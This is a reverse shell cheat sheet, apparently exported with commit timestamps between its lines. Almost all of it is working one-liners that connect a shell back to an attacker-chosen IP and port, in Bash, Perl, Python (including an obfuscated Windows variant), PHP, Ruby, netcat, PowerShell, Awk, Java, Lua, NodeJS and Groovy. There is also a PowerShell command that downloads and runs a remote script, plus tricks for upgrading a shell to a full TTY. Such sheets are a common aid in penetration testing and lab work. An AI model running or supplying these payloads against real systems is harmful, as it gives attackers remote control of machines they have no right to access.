2017-08-03 19:35:43 +00:00
# Reverse Shell Methods
## Reverse Shell Cheat Sheet
2018-08-11 22:17:58 +00:00
### Bash TCP
2018-08-12 21:30:22 +00:00
2017-08-03 19:35:43 +00:00
```bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>& 1
2018-02-15 22:27:42 +00:00
2017-08-03 19:35:43 +00:00
0< &196; exec 196< >/dev/tcp/< your IP > /< same unfiltered port > ; sh < & 196 >& 196 2>& 196
```
2018-08-11 22:17:58 +00:00
### Bash UDP
2018-08-12 21:30:22 +00:00
```bash
2018-02-15 22:27:42 +00:00
Victim:
sh -i >& /dev/udp/127.0.0.1/4242 0>& 1
Listener:
nc -u -lvp 4242
```
2018-08-11 22:17:58 +00:00
### Perl
2018-08-12 21:30:22 +00:00
2017-08-03 19:35:43 +00:00
```perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
2018-02-15 22:27:42 +00:00
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while< >;'
NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while< >;'
2017-08-03 19:35:43 +00:00
```
2018-08-11 22:17:58 +00:00
### Python
2018-08-12 21:30:22 +00:00
2018-10-02 15:17:03 +00:00
Linux only
2017-08-03 19:35:43 +00:00
```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
2018-10-02 15:17:03 +00:00
Windows only
```powershell
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__ (), __ctx.__exit__ (None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__ ': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__ ': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__ ('os', __g, __g))]][0] for __g['socket'] in [(__import__ ('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__ ('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__ ('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__ ('contextlib'))"
```
2018-08-11 22:17:58 +00:00
### PHP
2018-08-12 21:30:22 +00:00
2017-08-03 19:35:43 +00:00
```bash
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i < & 3 >& 3 2>&3"); '
```
2018-08-11 22:17:58 +00:00
### Ruby
2018-08-12 21:30:22 +00:00
2017-08-03 19:35:43 +00:00
```ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i < & %d >& %d 2>& %d",f,f,f)'
2018-02-15 22:27:42 +00:00
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
2017-08-03 19:35:43 +00:00
```
2018-08-11 22:17:58 +00:00
### Netcat Traditional
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```bash
nc -e /bin/sh [IPADDR] [PORT]
```
2018-08-11 22:17:58 +00:00
### Netcat OpenBsd
2018-08-12 21:30:22 +00:00
2017-08-03 19:35:43 +00:00
```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>& 1|nc 10.0.0.1 1234 >/tmp/f
```
2018-08-11 22:17:58 +00:00
### Ncat
2018-08-12 21:30:22 +00:00
2017-11-24 08:57:48 +00:00
```bash
ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash
```
2018-08-11 22:17:58 +00:00
### Powershell
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>& 1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
2018-04-12 21:23:41 +00:00
```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>& 1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
2018-03-12 08:17:31 +00:00
```powershell
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
```
2018-10-02 15:17:03 +00:00
### Awk
```powershell
awk 'BEGIN {s = "/inet/tcp/0/< IP > /< PORT > "; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```
2018-08-11 22:17:58 +00:00
### Java
2018-08-12 21:30:22 +00:00
2017-08-03 19:35:43 +00:00
```java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5< >/dev/tcp/10.0.0.1/2002;cat <& 5 | while read line; do \$line 2>& 5 >&5; done"] as String[])
p.waitFor()
```
2018-10-02 15:17:03 +00:00
### Lua
```powershell
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i < & 3 >& 3 2>&3'); "
```
2018-08-11 22:17:58 +00:00
### NodeJS
2018-08-12 21:30:22 +00:00
2017-08-03 19:35:43 +00:00
```javascript
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
2018-08-11 22:17:58 +00:00
2018-08-12 21:30:22 +00:00
or
2018-08-11 22:17:58 +00:00
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
2018-08-12 21:30:22 +00:00
or
2018-08-11 22:17:58 +00:00
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
2017-08-03 19:35:43 +00:00
```
2018-08-11 22:17:58 +00:00
### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
2018-08-12 21:30:22 +00:00
NOTE: Java reverse shell also work for Groovy
2018-08-11 22:17:58 +00:00
```javascript
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
2018-02-15 22:27:42 +00:00
## Spawn TTY
2018-08-12 21:30:22 +00:00
```bash
2018-02-15 22:27:42 +00:00
/bin/sh -i
```
(From an interpreter)
2018-08-12 21:30:22 +00:00
```powershell
2018-02-15 22:27:42 +00:00
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
```
2018-03-12 08:17:31 +00:00
Access shortcuts, su, nano and autocomplete in a partially tty shell
2018-10-01 10:30:14 +00:00
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
2018-08-12 21:30:22 +00:00
```powershell
2018-10-01 10:30:14 +00:00
# in host
2018-03-12 08:17:31 +00:00
ctrl+z
stty raw -echo
fg
2018-10-01 10:30:14 +00:00
# in reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows < num > columns < cols >
2018-03-12 08:17:31 +00:00
```
2018-02-15 22:27:42 +00:00
(From within vi)
2018-08-12 21:30:22 +00:00
```bash
2018-02-15 22:27:42 +00:00
:!bash
:set shell=/bin/bash:shell
```
(From within nmap)
2018-08-12 21:30:22 +00:00
```sh
2018-02-15 22:27:42 +00:00
!sh
```
2017-08-03 19:35:43 +00:00
## Thanks to
2018-08-12 21:30:22 +00:00
2017-08-03 19:35:43 +00:00
* [Reverse Bash Shell One Liner ](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner )
* [Pentest Monkey - Cheat Sheet Reverse shell ](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet )
2018-02-15 22:27:42 +00:00
* [Spawning a TTY Shell ](http://netsec.ws/?p=337 )
2018-03-12 08:17:31 +00:00
* [Obtaining a fully interactive shell ](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell )